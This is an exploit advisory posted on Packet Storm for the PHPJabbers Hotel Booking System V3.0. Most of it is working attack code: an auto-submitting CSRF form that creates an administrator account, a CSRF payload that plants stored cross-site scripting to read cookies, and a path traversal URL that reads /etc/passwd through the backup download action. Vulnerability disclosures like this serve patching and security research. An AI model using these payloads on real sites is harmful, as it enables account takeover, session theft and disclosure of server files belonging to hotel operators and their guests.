Hootel Booking System version 3.0 suffers from file disclosure, cross site request forgery, and cross site scripting vulnerabilities.
f11147ea6f2aed760f4ad6a0e7accb507d0036a71ce14fc127752e18bebeb542Hotel Booking System V3.0 - Multiple Vulnerabilties
====================================================================
####################################################################
.:. Author : HackXBack
.:. Contact : h-b@usa.com
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://www.phpjabbers.com/hotels-booking-system/
.:. Tested On Demo :
http://www.phpjabbers.com/demo/hb_30/1389729077/index.php?controller=pjAdmin&action=pjActionLogin
####################################################################
===[ Exploit ]===
[1] Cross Site Request Forgery
==============================
[Add Admin]
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="
http://site/index.php?controller=pjAdminUsers&action=pjActionCreate">
<input type="hidden" name="user_create" value="1"/>
<input type="hidden" name="role_id" value="1"/>
<input type="hidden" name="email" value="Email@hotmail.com"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="name" value="Iphobos"/>
<input type="hidden" name="status" value="T"/>
</form>
</body>
</html
[2] Cross Site Scripting
========================
# CSRF with XSS Exploit:
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0"
action="site/index.php?controller=pjAdminRooms&action=pjActionCreate">
<input type="hidden" name="room_create" value="1"/>
<input type="hidden" name="i18n[1][name]"
value="<script>alert(document.cookie);</script>"/>
<input type="hidden" name="i18n[3][name]" value=""/>
<input type="hidden" name="i18n[2][name]" value=""/>
<input type="hidden" name="i18n[1][description]" value="Iphobos"/>
<input type="hidden" name="i18n[3][description]" value=""/>
<input type="hidden" name="i18n[2][description]" value=""/>
<input type="hidden" name="adults" value="1"/>
<input type="hidden" name="children" value="0"/>
<input type="hidden" name="cnt" value="1"/>
</form>
</body>
</html>
[3] Local File disclure
========================
http://site/index.php?controller=pjBackup&action=pjActionDownload&id=../../../../../../../../etc/passwd
####################################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed